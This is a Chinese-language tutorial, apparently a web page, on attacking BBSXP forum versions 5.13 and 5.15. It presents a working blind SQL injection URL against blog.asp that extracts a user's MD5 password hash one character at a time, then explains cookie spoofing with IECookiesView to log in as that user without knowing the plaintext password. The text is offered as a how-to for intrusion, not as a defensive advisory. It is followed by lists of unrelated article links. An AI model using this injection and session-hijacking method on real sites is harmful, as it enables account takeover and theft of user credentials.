通过阅读本文，您将了解到：<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

1、一种手工得到两个版本的BBSXP论坛的用户md5密码的方法。

2、如何Cookie欺骗。

大家都知道BBSXP论坛5.13，5.15版本的blog.asp文件存在注入漏洞，网上也有几种这个漏洞的利用软件，可是有不少网友反映使用这些软件有时候无法成功得到完整的32位md5密码，还有一些利用软件被捆绑了***，所以我在本文介绍一种手工得到注册用户32位md5密码的方法。

我们可以通过提交下面的代码测试用户名为admin的32位md5密码中的第十位是否为3：/blog.asp?id=1%09and%09exists%09(select%09*%09from%09[user]%09where%09username=0x610064006D0069006E00%09and%09substring(userpass,10,1)=0x33)，如果是3的话，该日志就会返回正常的页面，否则会提示“该用户暂时没有任何日志”。其中

select%09*%09from%09[user]%09where%09username=0x610064006D0069006E00%09and%09substring(userpass,10,1)=0x33，这是一条select语句，意思是得到从user表中选出某条记录的username列=0x610064006D0069006E00并且该记录的userpass列的第10个字符=0x33 。

select的语法为：

SELECT FieldOFTableList

INTO VariableList

FROM TableName

WHERE Criteria；

其中FieldOFTableList代表接收数据的变量名列表，VariableList代表获得检索结果的变量，TableName代表被检索的表名，Criteria是检索条件。

  0x610064006D0069006E00是admin转换成十六进制得到的，这个字符串我们可以使用“ASCII及进制转换”这个小工具转换得到，如图1所示。

图1

0x33是3转换成十六进制得到的，从0到9，a到f的十六进制对应如下：

0 0x30 

1 0x31 

2 0x32 

3 0x33 

4 0x34 

5 0x35 

6 0x36 

7 0x37 

8 0x38  

9 0x39

a 0x61 

b 0x62 

c 0x63 

d 0x64 

e 0x65 

f 0x66

如果用户名是汉字，比如一个用户名为“测试”，那“测试”这个字符串转换成十六进制为0x B2E200CAD400，因为一个汉字占用两个字节的内存。这样经过不断的测试，会最终得到一个32位的md5密码，这时我们可以md5密码破解类软件进行破解，或者到一些md5密码破解网站进行破解，如果密码过于复杂，破解不出明文密码，那我们就可以使用IECookiesView这款软件进行cookie欺骗了，打开IECookiesView，找到BBSXP论坛的网址，分别将username和userpass改为要冒充的ID和我们得到的密码，并保存，如图2所示。

图2

然后重新打开一个ie页面，再访问该论坛，就会发现我们成为要冒充的用户了。在这里有个地方需要注意一下，我们在进行Cookie欺骗时，要将得到32位的md5密码中的字母设置为大写的，否则Cookie欺骗无法成功。

本文的测试论坛版本为BBSXP论坛5.13SQL版。

BBSXP论坛手工得到用户md5密码的方法相关推荐

1. Mysql当前的根密码核查_在MySQL数据库中复位根用户的密码的方法

   如果你从未为MySQL设置根用户密码,服务器在以根用户身份进行连接时不需要密码.但是,建议你为每个账户设置密码. 如果你以前设置了根用户密码,但却忘记了该密码,可设置新的密码.下述步骤是针对Windo ...

2. Linux root用户忘记密码解决方法

   概述 linux系统忘记root密码的情况该怎么办呢?重新安装系统吗?当然不用!进入单用户模式更改一下root密码即可. 方法一 : 单用户模式 重启linux系统 3 秒之内要按一下回车 出现如下界 ...

3. java中用户登陆密码加密方法

   /** * 生成安全的密码,生成随机的16位salt并经过1024次 sha-1 hash */ public static String entryptPassword(String plainPa ...

4. 警惕黑客使用Lion系统漏洞破解和修改用户登陆密码

   转载自:http://www.techolics.com/apple/20110922_72.html 9月19日,星期一,名为Patrick Dunstan的黑客公布了如何利用苹果最新Lion操作系 ...

5. 对用户的密码进行md5技术的加密

   一般来说,做项目时,在用户模块里,对用户的密码都是要进行加密的,这样在数据库表中看到的也不是明文密码.而是经过加密后的密码.在这里,我就介绍一种md5的加密方式.虽然现在这种加密方式也并不安全了(因为 ...

6. linux用户带密码迁移 LDAP

   http://www.360doc.com/content/13/0221/09/11635640_266880763.shtml http://bbs.chinaunix.net/thread-19 ...

7. 使用uc_authcode 获取论坛当前登录用户信息

   目的:使用uc_authcode 获取论坛当前登录用户信息 曲折:看了Discuz官方的ucenter二次开发手册,其中的Example如下: if(!empty($_COOKIE['Example_ ...

8. nginx通过用户和密码来实现认证功能

   nginx通过ngx_http_auth_basic_module 模块可以实现通过使用用户和密码来访问网页,这种通过用户和密码的机制是通过HTTP Basic Authentication协议来实现 ...

9. Linux学习之CentOS(二十二)--单用户模式下修改Root用户的密码

   在上一篇随笔里面详细讲解了Linux系统的启动过程 (Linux学习之CentOS(二十一)--Linux系统启动详解),我们知道Linux系统的启动级别一共有6种级别,通过 /etc/inittab ...

最新文章

1. 程序员的你还沉浸在大公司就是螺丝钉？小公司锻炼人？错了！看完即懂
2. Centos7 修改SSH 端口
3. 学习ASP.NET一定要学习ASP.NET AJAX吗？
4. linux安装篇之mongodb安装及服务自启动配置
5. 10-穿墙代理的设置 | 01.数据抓取 | Python
6. Apache JMeter教程
7. 阿里云参加ONS EU 2018，飞天洛神亮相网络顶会
8. MPICH C语言接口函数说明
9. Volley源码学习2--cache类
10. poj1083 解题报告（poj 1083 analysis report）
11. [收藏学习]Openstack中Keystone及dashboard安装参考
12. shell编程复习 第二次
13. dosbox详细安装级及使用
14. 宠物商店业务逻辑关系模型图
15. [RK3288][Android5.1] 调试笔记 --- LVDS+EDP双屏机器调节白平衡色温
16. 阿里云主机的公网带宽和私网带宽的介绍
17. 旧苹果电脑安装win10 双系统
18. PowerDesigner导出PDM和rtf文件
19. TemporalType
20. testlink linux,Linux下安装testlink

热门文章

1. NestJs WebSocket与Vue WebSocket
2. Html CSS的三种链接方式
3. python关键字evaluate_python – Keras中的model.evaluate()返回了什么值？
4. 联想笔记本触摸板失灵应对策略
5. #三、经典股市理论与博弈论、随机性的前世今生、恩怨情仇 （一）、经典理论与博弈论的划分
6. 股票量化交易软件：监视多币种的交易信号5--复合信号
7. jquery中append、prepend、before、after方法使用
8. 苹果AirTag发布2A36固件更新，Find My功能应用越来越广泛
9. 3dsmax批量导入、导出文件
10. excel2016打开为空白界面解决办法